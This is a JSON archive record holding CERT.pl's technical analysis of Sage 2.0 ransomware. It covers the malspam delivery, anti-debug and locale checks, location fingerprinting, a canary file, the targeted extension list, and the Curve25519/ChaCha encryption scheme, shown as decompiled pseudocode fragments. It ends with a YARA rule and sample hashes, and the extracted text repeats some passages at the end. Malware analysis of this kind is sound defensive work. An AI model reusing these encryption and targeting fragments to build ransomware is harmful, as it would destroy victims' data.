{
	"id": "0c2a13ea-7b3a-4aa8-9c13-6f3746a80256",
	"created_at": "2026-04-06T00:14:12.419187Z",
	"updated_at": "2026-04-10T03:22:02.377843Z",
	"deleted_at": null,
	"sha1_hash": "7711abb9dde4b6cc993c61a591601b7b31556f26",
	"title": "Sage 2.0 analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 947783,
	"plain_text": "Sage 2.0 analysis\r\nArchived: 2026-04-05 22:57:46 UTC\r\nIntroduction\r\nSage is a new ransomware family, a variant of CryLocker. Currently it’s distributed by the same\r\nactors that are usually distributing Cerber, Locky and Spora.\r\nIn this case malspam is the infection vector. Emails from the campaign contain only malicious zip\r\nfile without any text. Inside zip attachment there is malicious Word document with macro that\r\ndownloads and installs ransomware.\r\nAfter starting the ransomware, Windows UAC window is shown repeatedly until the user clicks yes.\r\nAt the end the encryption process is started and all files are encrypted:\r\nRansom message directs us to panel in the Tor network, but before we can log in we have to solve a\r\ncaptcha:\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 1 of 16\n\nAnd finally we are greeted with “user-friendly” panel:\r\nWe can even chat with malware creators:\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 2 of 16\n\nInterestingly, this ransomware doesn’t remove itself after encryption, but copies itself to\r\n%APPDATA%\\Roaming directory and re-encrypts all files after every reboot (until the ransom is\r\npaid).\r\nTechnical analysis\r\nAfter this short introduction, We’ll focus on the technical side (because Sage 2.0 is not completely a\r\ngeneric ransomware, few things are rather novel).\r\nMain function of binary looks like this:\r\nint main(int argc, const char **argv, const char **envp)\r\n{\r\nModCheck();\r\nDebugCheck();\r\nAntiDebug(v3);\r\nif ( AntiDebugCheckMutex() )\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 3 of 16\n\nreturn 0;\r\nGetOrGenerateMainCryptoKey();\r\nif ( IsProtectedLocale() )\r\n{\r\nFingerprintLocation(2);\r\nSleep(0x493E0u);\r\nFingerprintLocation(2);\r\nSleep(0x927C0u);\r\nFingerprintLocation(2);\r\nSelfDelete();\r\nresult = 0;\r\n}\r\nelse\r\n{\r\nif ( !CheckFingerprintLocation() )\r\nreturn 0;\r\nresult = CreateThreadsAndEncrypt(\u0026mainEncKeyt);\r\n}\r\nreturn result;\r\n}\r\nAs we see, there is a lot of fingerprinting and checks, though most of them are quite standard. More\r\ninteresting features include:\r\nDebug switch\r\nProbably something didn’t work on the first try, so there is a debug command line parameter to test\r\nthat configuration data is set correctly:\r\nLPWSTR *DebugCheck()\r\n{\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 4 of 16\n\ncmdLine = GetCommandLineW();\r\nresult = CommandLineToArgvW(cmdLine, \u0026numArgs);\r\nif ( numArgs == 2 )\r\n{\r\nresult = (LPWSTR *)result[1];\r\nif ( *result == 'd' \u0026\u0026 !*(result + 1) )\r\n{\r\nif ( AttachConsole(0xFFFFFFFF) )\r\n{\r\nstdout = GetStdHandle(0xFFFFFFF5);\r\ndebugmsg = sprintf_0(\"{\\\"b\\\":\\\"%#.*s\\\"}\", 8, FingerprintDword + 4);\r\nWriteFile(stdout, debugmsg, lstrlenA(debugmsg), \u0026NumberOfBytesWritten, 0);\r\n}\r\nExitProcess(0);\r\n}\r\n}\r\n}\r\nAnd surely enough, this debug parameter does what it should:\r\nSomeone probably forgot to remove this from the final version, because this is clearly a debugging\r\nfeature.\r\nLocale Check\r\nSage 2.0 creators like some nations more than others:\r\nsigned int IsProtectedLocale()\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 5 of 16\n\n{\r\nlocaleCount = GetKeyboardLayoutList(10, (HKL *)\u0026List);\r\nif ( localeCount \u003c= 0 )\r\nreturn 0;\r\ni = 0;\r\nif ( localeCount \u003c= 0 )\r\nreturn 0;\r\nwhile ( 1 )\r\n{\r\nnext = (unsigned int)(\u0026List)[i] \u0026 0x3FF;\r\nif ( next == 0x23 || next == 0x3F || next == 0x19 || next == 0x22 || next == 0x43 ||\r\n(_WORD)next == 0x85 )\r\nbreak;\r\nif ( ++i \u003e= localeCount )\r\nreturn 0;\r\n}\r\nreturn 1;\r\n}\r\nThis checks user keyboard layouts:\r\nnext == 0x23 -\u003e Belarussian\r\nnext == 0x3F -\u003e Kazakh\r\nnext == 0x19 -\u003e Russian\r\nnext == 0x22 -\u003e Ukrainian\r\nnext == 0x43 -\u003e Uzbek\r\nnext == 0x85 -\u003e Sakha\r\nWe’re a bit disappointed that Polish didn’t make it on the exception list (If Sage creators are reading\r\nthis: our locale is 0x15).\r\nLocation fingerprinting\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 6 of 16\n\nSage is trying to get it’s host location by querying maps.googleapis.com with current SSID and\r\nMAC:\r\nstrcpy_((int)arg0, \"/maps/api/browserlocation/json?browser=firefox\u0026sensor=true\");\r\ni = 0;\r\nif ( v12[1] )\r\n{\r\noffset = 0;\r\ndo\r\n{\r\nss_ = (int)\u0026v12[offset + 2];\r\nif ( *(_DWORD *)ss_ \u003c= 0x20u )\r\n{\r\nToHexStrring(\u0026mac, (unsigned __int8 *)\u0026v12[offset + 12]);\r\nstr_append(ssid, (_BYTE *)(ss_ + 4), *(_DWORD *)ss_);\r\nssid[*(_DWORD *)ss_] = 0;\r\nsprintf_1((int)arg0, \"\u0026wifi=mac:%s|ssid:%s|ss:%d\", \u0026mac, ssid, (*(_DWORD *)(ss_ + 60)\r\n\u003e\u003e 1) - 100);\r\n}\r\n++i;\r\noffset += 90;\r\n}\r\nwhile ( i \u003c v12[1] );\r\n}\r\n// ...\r\nDoHttpGetRequest((DWORD)\u0026dwNumberOfBytesAvailable, \"maps.googleapis.com\",\r\n0x1BBu, v8)\r\nCanary file\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 7 of 16\n\nBefore encryption Sage checks for existence of a special debug file:\r\nif ( CreateFileW(L\"C:\\\\Temp\\\\lol.txt\", 0x80000000, 1u, 0, 3u, 0, 0) == (HANDLE)-1 )\r\n{\r\n// encryption code\r\n}\r\nThanks to this, malware creators don’t have to worry about accidentally running the executable and\r\nencrypting their own files.\r\nFinally, if the file is not found, encryption is initiated.\r\nExtension whitelist\r\nOf course, not every file is encrypted – only files with whitelisted extension are touched:\r\n.dat .mx0 .cd .pdb .xqx .old .cnt .rtp .qss .qst .fx0 .fx1 .ipg .ert .pic .img\r\n.cur .fxr .slk .m4u .mpe .mov .wmv .mpg .vob .mpeg .3g2 .m4v .avi .mp4 .flv\r\n.mkv .3gp .asf .m3u .m3u8 .wav .mp3 .m4a .m .rm .flac .mp2 .mpa .aac .wma .djv\r\n.pdf .djvu .jpeg .jpg .bmp .png .jp2 .lz .rz .zipx .gz .bz2 .s7z .tar .7z .tgz\r\n.rar .zip .arc .paq .bak .set .back .std .vmx .vmdk .vdi .qcow .ini .accd .db\r\n.sqli .sdf .mdf .myd .frm .odb .myi .dbf .indb .mdb .ibd .sql .cgn .dcr .fpx\r\n.pcx .rif .tga .wpg .wi .wmf .tif .xcf .tiff .xpm .nef .orf .ra .bay .pcd .dng\r\n.ptx .r3d .raf .rw2 .rwl .kdc .yuv .sr2 .srf .dip .x3f .mef .raw .log .odg .uop\r\n.potx .potm .pptx .rss .pptm .aaf .xla .sxd .pot .eps .as3 .pns .wpd .wps .msg\r\n.pps .xlam .xll .ost .sti .sxi .otp .odp .wks .vcf .xltx .xltm .xlsx .xlsm\r\n.xlsb .cntk .xlw .xlt .xlm .xlc .dif .sxc .vsd .ots .prn .ods .hwp .dotm .dotx\r\n.docm .docx .dot .cal .shw .sldm .txt .csv .mac .met .wk3 .wk4 .uot .rtf .sldx\r\n.xls .ppt .stw .sxw .dtd .eml .ott .odt .doc .odm .ppsm .xlr .odc .xlk .ppsx\r\n.obi .ppam .text .docb .wb2 .mda .wk1 .sxm .otg .oab .cmd .bat .h .asx .lua .pl\r\n.as .hpp .clas .js .fla .py .rb .jsp .cs .c .jar .java .asp .vb .vbs .asm .pas\r\n.cpp .xml .php .plb .asc .lay6 .pp4 .pp5 .ppf .pat .sct .ms11 .lay .iff .ldf\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 8 of 16\n\n.tbk .swf .brd .css .dxf .dds .efx .sch .dch .ses .mml .fon .gif .psd .html\r\n.ico .ipe .dwg .jng .cdr .aep .aepx .123 .prel .prpr .aet .fim .pfb .ppj .indd\r\n.mhtm .cmx .cpt .csl .indl .dsf .ds4 .drw .indt .pdd .per .lcd .pct .prf .pst\r\n.inx .plt .idml .pmd .psp .ttf .3dm .ai .3ds .ps .cpx .str .cgm .clk .cdx .xhtm\r\n.cdt .fmv .aes .gem .max .svg .mid .iif .nd .2017 .tt20 .qsm .2015 .2014 .2013\r\n.aif .qbw .qbb .qbm .ptb .qbi .qbr .2012 .des .v30 .qbo .stc .lgb .qwc .qbp\r\n.qba .tlg .qbx .qby .1pa .ach .qpd .gdb .tax .qif .t14 .qdf .ofx .qfx .t13 .ebc\r\n.ebq .2016 .tax2 .mye .myox .ets .tt14 .epb .500 .txf .t15 .t11 .gpc .qtx .itf\r\n.tt13 .t10 .qsd .iban .ofc .bc9 .mny .13t .qxf .amj .m14 ._vc .tbp .qbk .aci\r\n.npc .qbmb .sba .cfp .nv2 .tfx .n43 .let .tt12 .210 .dac .slp .qb20 .saj .zdb\r\n.tt15 .ssg .t09 .epa .qch .pd6 .rdy .sic .ta1 .lmr .pr5 .op .sdy .brw .vnd .esv\r\n.kd3 .vmb .qph .t08 .qel .m12 .pvc .q43 .etq .u12 .hsr .ati .t00 .mmw .bd2 .ac2\r\n.qpb .tt11 .zix .ec8 .nv .lid .qmtf .hif .lld .quic .mbsb .nl2 .qml .wac .cf8\r\n.vbpf .m10 .qix .t04 .qpg .quo .ptdb .gto .pr0 .vdf .q01 .fcr .gnc .ldc .t05\r\n.t06 .tom .tt10 .qb1 .t01 .rpf .t02 .tax1 .1pe .skg .pls .t03 .xaa .dgc .mnp\r\n.qdt .mn8 .ptk .t07 .chg .#vc .qfi .acc .m11 .kb7 .q09 .esk .09i .cpw .sbf .mql\r\n.dxi .kmo .md .u11 .oet .ta8 .efs .h12 .mne .ebd .fef .qpi .mn5 .exp .m16 .09t\r\n.00c .qmt .cfdi .u10 .s12 .qme .int? .cf9 .ta5 .u08 .mmb .qnx .q07 .tb2 .say\r\n.ab4 .pma .defx .tkr .q06 .tpl .ta2 .qob .m15 .fca .eqb .q00 .mn4 .lhr .t99\r\n.mn9 .qem .scd .mwi .mrq .q98 .i2b .mn6 .q08 .kmy .bk2 .stm .mn1 .bc8 .pfd .bgt\r\n.hts .tax0 .cb .resx .mn7 .08i .mn3 .ch .meta .07i .rcs .dtl .ta9 .mem .seam\r\n.btif .11t .efsl .$ac .emp .imp .fxw .sbc .bpw .mlb .10t .fa1 .saf .trm .fa2\r\n.pr2 .xeq .sbd .fcpa .ta6 .tdr .acm .lin .dsb .vyp .emd .pr1 .mn2 .bpf .mws\r\n.h11 .pr3 .gsb .mlc .nni .cus .ldr .ta4 .inv .omf .reb .qdfx .pg .coa .rec .rda\r\n.ffd .ml2 .ddd .ess .qbmd .afm .d07 .vyr .acr .dtau .ml9 .bd3 .pcif .cat .h10\r\n.ent .fyc .p08 .jsd .zka .hbk .mone .pr4 .qw5 .cdf .gfi .cht .por .qbz .ens\r\n.3pe .pxa .intu .trn .3me .07g .jsda .2011 .fcpr .qwmo .t12 .pfx .p7b .der .nap\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 9 of 16\n\n.p12 .p7c .crt .csr .pem .gpg .key\r\nEncryption\r\nAs usual, this is the most interesting thing in ransomware code. Sage 2.0 is especially unusual\r\nbecause it encrypts files with elliptic curve cryptography.\r\nThe curve used for encryption is y^2 = x^3 + 486662x^x + x over the prime field defined by 2^255\r\n– 19, with base point x=9. These values are not arbitrary – this curve is also called Curve25519 and\r\nis the state of the art in modern cryptography. Not only it’s one of the fastest ECC curves, it’s also\r\nless vulnerable to weak RNG, designed with side-channel attacks in mind, avoids many potential\r\nimplementation pitfalls, and (probably) not backdoored by any three-letter agency.\r\nCurve25519 is used with hardcoded public key for shared secret generation. The exact code looks\r\nlike this (with structures and function names by us):\r\nint __cdecl GenerateMainKey(curve_key *result, const void *publicKey)\r\n{\r\nchar mysecret[32]; // [esp+4h] [ebp-40h]@1\r\nchar shared[32]; // [esp+24h] [ebp-20h]@1\r\nresult-\u003eflag = 1;\r\nGenerateCurve25519SecretKey(mysecret);\r\nComputeCurve25519MatchingPublicKey(result-\u003egpk, mysecret);\r\nComputeCurve25519SharedSecret(shared, mysecret, publicKey);\r\nConvertBytesToCurve22519SecretKey(shared);\r\nComputeCurve25519MatchingPublicKey(result-\u003epk, shared);\r\nreturn 0;\r\n}\r\nThis looks like properly implemented Elliptic Curve Diffie-Hellman (ECDH) protocol, but without\r\nprivate keys saved anywhere (they are useful only for decryption and malicious actors can create\r\nthem anyway using their private key).\r\nThis may look complicated, but almost all those functions are just wrappers for ECC primitive –\r\nnamed CurveEncrypt by us. For example, computing matching public key is curve25519(secretKey,\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 10 of 16\n\nbasePoint) – where basePoint is equal to 9 (one 9 and 31 zeroes).\r\nint __cdecl ComputeCurve25519MatchingPublicKey(char *outPtr, char *randbytes)\r\n{\r\nchar key[32]; // [esp+8h] [ebp-20h]@1\r\nqmemcpy(key, \u0026Curve25519BasePoint, sizeof(key));\r\nkey[31] = Curve25519BasePointEnd \u0026 0x7F;\r\nreturn CurveEncrypt(outPtr, randbytes, key);\r\n}\r\nShared key computation is very similar, but instead of using constant base point we use public key:\r\nint __cdecl ComputeCurve25519SharedSecret(char *shared, char *mySecret, const void\r\n*otherPublicKey)\r\n{\r\nchar a3a[32]; // [esp+8h] [ebp-20h]@1\r\nqmemcpy(a3a, otherPublicKey, sizeof(a3a));\r\na3a[31] \u0026= 0x7Fu;\r\nreturn CurveEncrypt(shared, mySecret, a3a);\r\n}\r\nDue to the design of Curve25519, converting between any sequence of random bytes and a secret\r\nkey is very easy – it’s enough to mask few bits:\r\ncurve_key *__cdecl ConvertBytesToCurve22519SecretKey(curve_key *a1)\r\n{\r\ncurve_key *result; // eax@1\r\nchar v2; // cl@1\r\nresult = a1;\r\nv2 = a1-\u003egpk[31];\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 11 of 16\n\nresult-\u003egpk[0] \u0026= 248u;\r\na1-\u003egpk[31] = v2 \u0026 0x3F | 0x40;\r\nreturn result;\r\n}\r\nAnd, also because of this, secret key generation is completely trivial (it’s enough to generate 32\r\nrandom bytes and convert them to the secret key):\r\nint __cdecl GenerateCurve25519SecretKey(_BYTE *buffer)\r\n{\r\nchar v1; // al@1\r\ngetSecureRandom(32, (int)buffer);\r\nv1 = buffer[31];\r\n*buffer \u0026= 248u;\r\nbuffer[31] = v1 \u0026 0x3F | 0x40;\r\nreturn 0;\r\n}\r\nThat’s all for the key generation. What about file encryption? Files are encrypted with ChaCha\r\n(unconventional algorithm, again) and key is appended to output file – but after being encrypted\r\nwith Curve25519:\r\nGenerateCurve25519SecretKey(\u0026secretKey);\r\nComputeCurve25519MatchingPublicKey(pubKey, \u0026secretKey);\r\nComputeCurve25519SharedSecret(sharedSecret, \u0026secretKey, ellipticCurveKey-\u003epk);\r\n//\r\nChaChaInit(\u0026chaCha20key, (unsigned __int8 *)sharedSecret, (unsigned __int8 *)minikey);\r\nwhile (bytesLeftToRead) {\r\n// Read from file to lpBuff\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 12 of 16\n\nChaChaEncrypt(\u0026chaCha20key, lpBuff, lpBuff, numBytesRead);\r\n// Write from file to lpBuff\r\n}\r\nAppendFileKeyInfo(hFile_1, ellipticCurveKey, \u0026FileSize, pubKey, a5);\r\nAppendFileKeyInfo fucntion appends sharedKey and pubKey to the file:\r\nint __cdecl AppendFileKeyInfo(HANDLE hFile, curve_key *sharedKey, DWORD\r\n*dataSize, char *pubKey, int a5)\r\n{\r\nDWORD dataSizeV; // edx@1\r\nint result; // eax@3\r\n_DWORD buffer[24]; // [esp+8h] [ebp-60h]@1\r\nbuffer[0] = 0x5A9EDEAD;\r\nqmemcpy(\u0026buffer[1], sharedKey, 0x20u);\r\nqmemcpy(\u0026buffer[9], pubKey, 0x20u);\r\ndataSizeV = *dataSize;\r\nbuffer[19] = dataSize[1];\r\nbuffer[18] = dataSizeV;\r\nbuffer[21] = a5;\r\nbuffer[20] = 0;\r\nbuffer[22] = 0x5A9EBABE;\r\nif ( WriteFile(hFile, buffer, 0x60u, (LPDWORD)\u0026sharedKey, 0) \u0026\u0026 sharedKey ==\r\n(curve_key *)96 )\r\nresult = 0;\r\nelse\r\nresult = -5;\r\nreturn result;\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 13 of 16\n\n}\r\nChaCha is not very popular algorithm among ransomware creators. It’s very closely related to\r\nSalsa20 which was used in Petya ransomware. We don’t know why AES is not good enough for\r\nSage – probably it’s only trying to be different.\r\nIn other words, there are two sets of keys + one key pair for every encrypted file:\r\nmy_secret \u003c- random\r\nmy_public \u003c- f(my_secret) # gpk\r\nsh_secret \u003c- f(my_secret, c2_public)\r\nsh_public \u003c- f(sh_secret) # pk\r\nfl_secret \u003c- random\r\nfl_public \u003c- f(fl_secret)\r\nfl_shared \u003c- f(fl_secret, sh_public)\r\nchachakey \u003c- f(fl_shared)\r\nAfter ransomware finishes we know only my_public, sh_public, fl_shared, but we need chachakey\r\nto actually decrypt the file.\r\nThis encryption scheme is quite solid because it makes offline encryption possible – there is no need\r\nto bother connecting with C\u0026C and negotiating encryption keys – the public key is hardcoded in\r\nbinary and because of asymmetric cryptography decryption is impossible. Assuming that malware\r\ncreators didn’t make any drastic implementation mistakes (and we have no reason to suspect that\r\nthey did), recovery of encrypted files is impossible. Of course, it’s always possible that master\r\nencryption key will eventually be leaked or released.\r\nAdditional information\r\nYara rules:\r\nrule sage\r\n{\r\nmeta:\r\nauthor=\"msm\"\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 14 of 16\n\nstrings:\r\n/* ransom message */\r\n$ransom1 = \"ATTENTION! ALL YOUR FILES WERE ENCRYPTED!\"\r\n$ransom2 = \"SAGE 2.0 uses military grade elliptic curve cryptography and you\"\r\n/* other strings */\r\n$str0 = \"!Recovery_%s.html\"\r\n$str1 = \"/CREATE /TN \\\"%s\\\" /TR \\\"%s\\\" /SC ONLOGON /RL HIGHEST /F\"\r\n/* code */\r\n$get_subdomain = {8B 0D ?? ?? 40 00 6A ?? [2] A1 ?? ?? 40 00 5? 5? 50 51 53 E8}\r\n$debug_file_name = {6A 00 6A 01 68 00 00 00 80 68 [4] FF 15 [4] 83 F8 FF}\r\n$get_request_subdomain = {74 ?? A1 [4] 5? 5? 68 ?? ?? 40 00 E8}\r\n$get_ec_pubkey = {68 [2] 40 00 68 [2] 40 00 E8 [4] 68 B9 0B 00 00 6A 08 E8}\r\n$get_extensions = { 8B 35 [2] 40 00 [0-3] 80 3E 00 74 24 }\r\ncondition:\r\nall of ($ransom*) and any of ($str*)\r\nand any of ($get_subdomain, $debug_file_name, $get_request_subdomain, $get_ec_pubkey,\r\n$get_extensions)\r\n}\r\nHashes (sha256):\r\nsample 1, 362baeb80b854c201c4e7a1cfd3332fd58201e845f6aebe7def05ff0e00bf339\r\nsample 2,\r\n3b4e0460d4a5d876e7e64bb706f7fdbbc6934e2dea7fa06e34ce01de8b78934c\r\nsample 3,\r\nccd6a495dfb2c5e26cd65e34c9569615428801e01fd89ead8d5ce1e70c680850\r\nsample 4,\r\n8a0a191d055b4b4dd15c66bfb9df223b384abb75d4bb438594231788fb556bc2\r\nsample 5,\r\n0ecf3617c1d3313fdb41729c95215c4d2575b4b11666c1e9341f149d02405c05\r\nAdditional information:\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 15 of 16\n\nhttps://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga – short, but very condensed analysis performed by Swiss CERT.\r\nSource: https://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 16 of 16\n\n  https://www.cert.pl/en/news/single/sage-2-0-analysis/ \nAnd finally we are greeted with “user-friendly” panel:\nWe can even chat with malware creators: \n   Page 2 of 16\n\n.mhtm .cmx .inx .plt .idml .cpt .csl .indl .dsf .pmd .psp .ttf .ds4 .drw .3dm .ai .3ds .indt .pdd .per .ps .cpx .str .cgm .lcd .pct .prf .clk .cdx .pst .xhtm\n.cdt .fmv .aes .gem .max .svg .mid .iif .nd .2017 .tt20 .qsm .2015 .2014 .2013\n.aif .qbw .qbb .qbm .ptb .qbi .qbr .2012 .des .v30 .qbo .stc .lgb .qwc .qbp\n.qba .tlg .qbx .qby .1pa .ach .qpd .gdb .tax .qif .t14 .qdf .ofx .qfx .t13 .ebc\n.ebq .2016 .tax2 .mye .myox .ets .tt14 .epb .500 .txf .t15 .t11 .gpc .qtx .itf\n.tt13 .t10 .qsd .iban .ofc .bc9 .mny .13t .qxf .amj .m14 ._vc .tbp .qbk .aci\n.npc .qbmb .sba .cfp .nv2 .tfx .n43 .let .tt12 .210 .dac .slp .qb20 .saj .zdb\n.tt15 .ssg .t09 .epa .qch .pd6 .rdy .sic .ta1 .lmr .pr5 .op .sdy .brw .vnd .esv\n.kd3 .vmb .qph .t08 .qel .m12 .pvc .q43 .etq .u12 .hsr .ati .t00 .mmw .bd2 .ac2\n.qpb .tt11 .zix .ec8 .nv .lid .qmtf .hif .lld .quic .mbsb .nl2 .qml .wac .cf8\n.vbpf .m10 .qix .t04 .qpg .quo .ptdb .gto .pr0 .vdf .q01 .fcr .gnc .ldc .t05\n.t06 .tom .tt10 .qb1 .t01 .rpf .t02 .tax1 .1pe .skg .pls .t03 .xaa .dgc .mnp\n.qdt .mn8 .ptk .t07 .chg .#vc .qfi .acc .m11 .kb7 .q09 .esk .09i .cpw .sbf .mql\n.dxi .kmo .md .u11 .oet .ta8 .efs .h12 .mne .ebd .fef .qpi .mn5 .exp .m16 .09t\n.00c .qmt .cfdi .u10 .s12 .qme .int? .cf9 .ta5 .u08 .mmb .qnx .q07 .tb2 .say\n.ab4 .pma .defx .tkr .q06 .tpl .ta2 .qob .m15 .fca .eqb .q00 .mn4 .lhr .t99\n.mn9 .qem .scd .mwi .mrq .q98 .i2b .mn6 .q08 .kmy .bk2 .stm .mn1 .bc8 .pfd .bgt\n.hts .tax0 .cb .resx .mn7 .08i .mn3 .ch .meta .07i .rcs .dtl .ta9 .mem .seam\n.btif .11t .efsl .$ac .emp .imp .fxw .sbc .bpw .mlb .10t .fa1 .saf .trm .fa2\n.pr2 .xeq .sbd .fcpa .ta6 .tdr .acm .lin .dsb .vyp .emd .pr1 .mn2 .bpf .mws\n.h11 .pr3 .gsb .mlc .nni .cus .ldr .ta4 .inv .omf .reb .qdfx .pg .coa .rec .rda\n.ffd .ml2 .ddd .ess .qbmd .afm .d07 .vyr .acr .dtau .ml9 .bd3 .pcif .cat .h10\n.ent .fyc .p08 .jsd .zka .hbk .mone .pr4 .qw5 .cdf .gfi .cht .por .qbz .ens\n.3pe .pxa .intu .trn .3me .07g .jsda .2011 .fcpr .qwmo .t12 .pfx .p7b .der .nap\n   Page 9 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/sage-2-0-analysis/"
	],
	"report_names": [
		"sage-2-0-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434452,
	"ts_updated_at": 1775791322,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.pdf",
		"text": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.txt",
		"img": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.jpg"
	}
}